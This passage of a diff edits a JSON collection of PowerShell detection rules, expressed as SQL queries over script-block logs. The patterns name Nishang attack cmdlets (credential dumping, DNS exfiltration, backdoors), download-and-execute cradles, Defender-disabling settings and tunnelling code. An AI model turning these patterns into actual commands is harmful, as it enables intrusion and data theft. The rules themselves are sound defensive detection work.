Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion" ], "falsepositives": [ - 
"Legitimate user creation" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec 
Costello", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -6346,425 +6239,418 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" - ], - 
"filename": "posh_ps_automated_collection.yml" - }, - { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", - "status": "test", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": 
"Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP 
'\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
